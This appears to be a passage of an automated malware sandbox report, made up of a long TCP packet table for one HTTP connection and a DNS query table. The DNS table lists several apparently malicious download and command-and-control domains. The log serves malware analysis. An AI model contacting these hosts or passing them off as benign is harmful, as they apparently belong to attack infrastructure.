                                                                              Oct 26, 2023 09:48:08.618027925 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.618082047 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.618122101 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.618132114 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.618185043 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.618222952 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.618256092 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.618323088 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.618364096 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.618573904 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.619149923 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.619191885 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.619224072 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.619291067 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.619328022 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.619564056 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.619699001 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.619735956 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.620218039 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.620325089 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.620362997 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.620961905 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.621030092 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.621064901 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.621260881 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.621395111 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.621429920 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.621429920 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.621666908 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.621716976 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.621731997 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.621790886 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.621826887 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.621839046 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.621916056 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.621977091 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.622003078 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.622031927 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.622073889 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.622675896 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.622756004 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.622796059 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.622828007 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.622896910 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.622935057 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.623008013 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.623097897 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.623136044 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.623270988 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.623732090 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.623779058 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.623805046 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.623842955 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.623883963 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.623970032 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.624063969 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.624104977 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.624134064 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.624299049 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.624341011 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.624500990 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.624572992 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.624617100 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.624630928 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.624686003 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.624731064 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.624738932 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.624774933 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.624818087 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.624861002 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.625576019 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.625626087 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.625629902 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.625683069 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.625725031 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.625796080 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.625955105 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.625998974 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.626091003 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.626147032 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.626193047 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.627387047 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.627476931 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.627522945 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.627579927 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.627631903 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.627674103 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.627731085 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.627777100 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.627826929 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.627829075 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.627998114 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.628035069 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.628045082 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.628096104 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.628139019 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.628140926 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.628230095 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.628273010 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.628324032 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.628371954 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.628415108 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.628593922 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.628642082 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.628685951 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.628689051 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.628799915 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.628843069 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.628882885 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.628930092 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.628968954 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.629005909 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.629057884 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.629098892 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.629179955 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.629231930 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.629271984 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.629321098 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.629369974 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.629416943 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.629417896 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.629587889 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.629628897 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.629667997 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.629936934 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.629980087 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.630004883 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.630108118 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.630150080 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.630181074 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.630259991 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.630301952 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.630306959 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.630384922 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.630425930 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.634860039 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.635097980 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.635132074 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.635149956 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.635183096 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.635227919 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.635231972 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.635281086 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.635323048 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.635329008 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.635368109 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.635411978 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.635426044 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.635463953 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.635505915 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.635507107 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.635554075 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.635586023 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.635596991 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.635617971 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.635662079 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.635757923 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.635799885 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.635839939 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.635924101 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.636018038 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.636049986 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.636059999 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.636101961 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.636142969 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.636181116 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.637094021 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.637140989 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.637147903 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.637190104 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.637229919 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.637363911 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.637484074 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.637526035 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.637542009 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.637650967 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.637696981 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.638175011 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.638210058 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.638257980 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.638756990 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.638813019 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.638935089 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.638959885 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.638995886 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.639040947 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.639405966 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.639476061 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.639518976 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.639779091 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.639921904 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.639966965 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.639969110 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.640055895 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.640096903 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.640156031 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.640352011 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.640439034 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.640525103 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.640623093 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.640623093 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.640644073 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.640744925 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.640785933 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.640827894 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.640934944 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.640980005 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.641352892 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.641398907 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.641442060 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.641460896 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.641519070 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.641561985 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.641638041 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.641760111 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.641801119 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.641823053 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.641951084 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.641993999 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.642051935 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.642122030 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.642163038 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.642179012 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.642215967 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.642258883 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.642287016 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.642324924 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.642366886 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.642554998 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.642608881 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.642652988 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.642661095 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.642745018 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.642785072 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.642797947 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.642883062 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.642924070 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.642935991 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.643070936 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.643112898 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.643126011 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.643182993 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.643219948 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.643223047 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.643337011 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.643377066 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.643425941 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.643481016 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.643526077 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.643831968 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.643883944 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.643924952 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.643955946 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.643991947 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.644023895 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.644030094 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.644398928 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.644445896 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.644462109 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.644515991 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.644552946 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.644556046 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.644603968 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.644644022 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.644689083 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.644746065 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.644787073 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.645298004 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.645350933 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.645394087 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.645401955 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.645452976 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.645495892 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.645539999 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.645634890 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.645675898 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.645720959 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.646333933 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.646384954 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.646454096 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.646502972 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.646552086 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.646564007 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.646610022 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.646650076 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.646661997 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.646748066 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.646790981 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.709991932 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.710033894 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.710092068 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.710100889 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.710155010 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.710203886 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.710253954 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.710308075 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.710361004 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.710390091 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.711066961 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.711114883 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.711117983 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.711172104 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.711214066 CEST4977280192.168.2.7172.67.132.61
                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                              Oct 26, 2023 09:45:51.694464922 CEST192.168.2.71.1.1.10xde3fStandard query (0)urlhaus.abuse.chA (IP address)IN (0x0001)false
                                                                              Oct 26, 2023 09:45:54.015635967 CEST192.168.2.71.1.1.10x4732Standard query (0)china.dhabigroup.topA (IP address)IN (0x0001)false
                                                                              Oct 26, 2023 09:45:58.069351912 CEST192.168.2.71.1.1.10x451cStandard query (0)cdn.discordapp.comA (IP address)IN (0x0001)false
                                                                              Oct 26, 2023 09:46:01.048510075 CEST192.168.2.71.1.1.10xef3Standard query (0)whitecatcorn.comA (IP address)IN (0x0001)false
                                                                              Oct 26, 2023 09:46:01.948710918 CEST192.168.2.71.1.1.10x752aStandard query (0)time.windows.comA (IP address)IN (0x0001)false
                                                                              Oct 26, 2023 09:46:20.155275106 CEST192.168.2.71.1.1.10x33f2Standard query (0)www.mantap89.onlineA (IP address)IN (0x0001)false
                                                                              Oct 26, 2023 09:46:35.698753119 CEST192.168.2.71.1.1.10xcad4Standard query (0)www.bradslinkard.comA (IP address)IN (0x0001)false
                                                                              Oct 26, 2023 09:46:38.519771099 CEST192.168.2.71.1.1.10xa8f0Standard query (0)www.collibrishop.onlineA (IP address)IN (0x0001)false
                                                                              Oct 26, 2023 09:46:49.238275051 CEST192.168.2.71.1.1.10x5271Standard query (0)www.hotelunivers84.comA (IP address)IN (0x0001)false
                                                                              Oct 26, 2023 09:46:53.629348040 CEST192.168.2.71.1.1.10xde15Standard query (0)www.vaskaworldairways.comA (IP address)IN (0x0001)false
                                                                              Oct 26, 2023 09:46:58.597554922 CEST192.168.2.71.1.1.10xe437Standard query (0)www.lpqxmz.siteA (IP address)IN (0x0001)false
                                                                              Oct 26, 2023 09:46:59.612552881 CEST192.168.2.71.1.1.10xe437Standard query (0)www.lpqxmz.siteA (IP address)IN (0x0001)false
                                                                              Oct 26, 2023 09:47:03.050499916 CEST192.168.2.71.1.1.10xaa25Standard query (0)www.lesresort.shopA (IP address)IN (0x0001)false
